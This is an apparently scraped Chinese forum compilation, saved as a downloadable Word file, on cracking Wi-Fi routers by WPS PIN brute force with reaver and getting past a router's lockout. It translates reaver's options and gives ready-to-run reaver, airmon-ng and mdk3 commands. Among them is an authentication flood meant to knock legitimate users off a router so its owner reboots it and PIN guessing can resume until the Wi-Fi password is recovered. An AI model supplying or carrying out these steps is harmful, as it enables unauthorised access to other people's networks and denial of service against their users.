PIN死循环解决方法及mdk3攻击模式详解分解Word文件下载.docx

1、ssid ESSID of the target AP路由器的ESSID，一般不用指定-c, -channel= Set the 802.11 channel for the interface （implies -f）信号的频道，如果不指定会自动扫描-o, -out-file= Send output to a log file stdout标准输出到文件-s, -session= Restore a previous session file恢复进程文件-C, -exec= Execute the supplied command upon successful pin recoveryp

2、in成功后执行命令-D, -daemonize Daemonize reaver设置reaver成Daemon-a, -auto Auto detect the best advanced options for the target AP对目标AP自动检测高级参数-f, -fixed Disable channel hopping禁止频道跳转-5, -5ghz Use 5GHz 802.11 channels使用5G频道-v, -verbose Display non-critical warnings （-vv for more）显示不重要警告信息 -vv 可以显示更多-q, -quiet

3、 Only display critical messages只显示关键信息-h, -help Show help显示帮助Advanced Options:-p, -pin= Use the specified 4 or 8 digit WPS pin直接读取psk（本人测试未成功，建议用网卡自带软件获取）-d, -delay= Set the delay between pin attempts 1pin间延时，默认1秒，推荐设0-l, -lock-delay= Set the time to wait if the AP locks WPS pin attempts 60AP锁定WPS后等

4、待时间-g, -max-attempts= Quit after num pin attempts最大pin次数-x, -fail-wait= Set the time to sleep after 10 unexpected failures 010次意外失败后等待时间，默认0秒-r, -recurring-delay= Sleep for y seconds every x pin attempts每x次pin后等待y秒-t, -timeout= Set the receive timeout period 5收包超时，默认5秒-T, -m57-timeout= Set the M5/M7

5、 timeout period 0.20M5/M7超时，默认0.2秒-A, -no-associate Do not associate with the AP （association must be done by another application）不连入AP（连入过程必须有其他程序完成）-N, -no-nacks Do not send NACK messages when out of order packets are received不发送NACK信息（如果一直pin不动，可以尝试这个参数）-S, -dh-small Use small DH keys to improve

6、crack speed使用小DH关键值提高速度（推荐使用）-L, -ignore-locks Ignore locked state reported by the target AP忽略目标AP报告的锁定状态-E, -eap-terminate Terminate each WPS session with an EAP FAIL packet每当收到EAP失败包就终止WPS进程-n, -nack Target AP always sends a NACK Auto对目标AP总是发送NACK，默认自动-w, -win7 Mimic a Windows 7 registrar False模拟w

7、in7注册，默认关闭-个人心得-对一个ap刚开始pin的时候打开-vv参数，如果顺利，就中断，然后改成-v继续pin，反正进度是可以保存的reaver -i mon0 -b xx:xx:xx -d 0 -vv -a -S如果一直pin不动，尝试加-N参数xx -d 0 -vv -a -S NAP洪水攻击1、打气筒 mdk3攻击模式操作方法首先检测网卡：ifconfig -a然后模拟端口：airmon-ng start wlan0接下来用：airodump-ng mon0扫描ap找到你pin死的路由器mac用mdk3 做身份验证攻击mdk3 mon0 a -a mac（被pin死的路由器的mac

8、）身份验证攻击效果说明：此攻击是针对无线AP的洪水攻击，又叫做身份验证攻击。其原理就是向AP发动大量的虚假的链接请求，这种请求数量一旦超 过了无线AP所能承受的范围，AP就会自动断开现有链接，使合法用户无法使用无线网络。迫使路由主人重启路由器。说明：此命令功能强大，使用错误会造成所有ap不能使用，请指定mac地址，然后使用，其余命令不要乱试。你要使用此命令的其他参数，请详细阅读此命令参数详解 2、CDlinux mdk3攻击模式操作方法首先进入CDlinux，打开水滴或者打气筒搜索pin死的MAC地址（直接打开螃蟹或者3070驱动搜索无线MAC地址也OK）。2012-8-30 01:31 上传

9、下载附件 （58.72 KB）然后点击左下角CDlnux图标，依次打开 无线安全-mdk3-v6下载附件 （30.73 KB）进入mdk3后输入命令mdk3 mon0 a -a 40:16:9F:*:2C:B2（40:B2为你pin死的路由的MAC，注意空格和大小写）下载附件 （59.9 KB）回车后进入攻击模式，时间不要太长，最多半分钟就可以关闭对话框然后重新扫描网络看pin死的路由是不是已经不在了。等待主人重启吧非CDLinux可以在这里启动命令输入框注意：1、只有客户端在线时进行攻击才可能达到迫使重启目的，信号越强，效果越佳。2、每次攻击最好不超5min，否则卡死（看机器配置），稍停1m

10、in在进行攻击，连续攻击三次应该就可以了！8C210A pin重码或者pin死路由器的解决办法（我验证貌似有效）看看我重码拼死后,的时候2012-9-18 03:02 上传下载附件 （32.01 KB）拼死路由器后,整整一晚上没有在找到这个信号,今天起床在看,发现又出来了,继续拼, 发现,重码非常非常的严重,今天中午放弃N次,今晚在小试一下,加了参数后,大减少重码,坚持就是胜利,往下看。下载附件 （16.8 KB）下载附件 （15.99 KB）看到了吧,重码,不过,是偶偶的了,加了参数后,不会像昨天和今天上午那样,一直重码一个码不动了.在往下看,奇迹出现了。03 上传下载附件 （17.99 K

11、B）2012-1-25 13:18 上传下载次数: 2Pin码重复出现死循环解决办法1. xiaopanOS环境解决之道：当你看到PIN到一定程度，窗口里的PIN码不变、进度百分比也不走，那么，保持原窗口不变，再点击ROOTSHELL图标，新开一个PIN窗口，输入 reaver -i mon0 -b 正在PIN的MAC -a -s -vv （注意：这里“S”要小写） 那么，你就会发现原来PIN的窗口，PIN码开始改变，进度开始前进了！而且PIN的时间也大为缩短了！如果是PJ到99.99%，执行此部操作就马上弹出正确的pin码和wifi密码，以及路由器的SSIDPIN码和密码。2012-10-5

12、 02:48 上传pin过程中解决90.9%和99.9%死循环的实践，证明非常有效。pin到 90.9%死循环，说明前四位已经pin完，但是没出；原因大概就是AP没发出确认信息，reaver就已经跳过了，从而错过了正确前四位的确认。pin到 99.9%死循环，说明后四位的前三已经跑完，但是没出。原因同上。经过实践，已经找到原因所在，论坛里 的方法，大概 MAC 后跟的后缀都是 -vv -a -S，然而，殊不知，这样的后缀虽然可以加快速度，但是，也有可能会错过正确前四等的确认。所以，不放过每一次确认信息的表达式是reaver -i mon0 -b MAC -v -a -n ，其他的就不用了。还可以加一个 -c。基本从我遇到90.9%和99.9%的死循环的实践来看，已经100%成功了。参数改成-a -v -S -n就pin出来了你在点Reaver的时候弹出的对话框中的数字-a -v -S -x 20 -r 100:10 -l 300 其中的S改为n,在300后面加空格，输入-p加空格再加上次的pin码，比如-p 69840001，然后点OK继续上次的进度。, & f（ ?0 Y: K$ h7 2 b5 k# I下载附件 （66.21 KB）